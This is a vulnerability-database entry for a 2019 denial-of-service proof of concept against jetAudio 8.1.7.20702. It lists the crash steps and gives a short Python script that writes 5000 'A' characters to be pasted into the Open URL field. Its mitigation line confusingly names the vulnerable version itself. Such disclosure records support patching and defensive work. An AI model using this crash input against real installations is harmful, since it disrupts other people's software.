header-logo
Suggest Exploit
vendor:
jetAudio
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: jetAudio
Affected Version From: 8.1.7.20702
Affected Version To: 8.1.7.20702
Patch Exists: YES
Related CWE: N/A
CPE: a:jetaudio:jetaudio
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64 / Windows 10 Single Language x64
2019

jetAudio 8.1.7.20702 Basic – Denial of Service (PoC)

jetAudio 8.1.7.20702 is vulnerable to a denial of service attack when a maliciously crafted file is opened via the 'Open URL...' option in the 'Basic Controls' menu. An attacker can exploit this vulnerability by running a python code to create a malicious file, copying the content of the file to the clipboard, and then pasting it into the 'Enter URL' field in the 'Open URL...' option. This will cause the application to crash.

Mitigation:

Update to the latest version of jetAudio 8.1.7.20702.
Source

Exploit-DB raw data:

#Exploit Title:  jetAudio 8.1.7.20702 Basic - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-07
#Vendor Homepage: http://www.jetaudio.com/
#Software Link: http://www.jetaudio.com/download/
#Tested Version: 8.1.7.20702
#Tested on: Windows 7 Service Pack 1 x64 / Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: jetAudio_8.1.7.20702.py
#2.- Open jetAudio.txt and copy content to clipboard
#2.- Open jetAudio 
#3.- Select Menu > Basic Controls > Open URL...
#4.- In "Enter URL" Paste ClipBoard after "http://" 
#5.- Click on "Ok"
#6.- Crashed

cod = "\x41" * 5000
f = open('jetAudio.txt', 'w')
f.write(cod)
f.close()

Navigation

Suggest Exploit

Services By CQR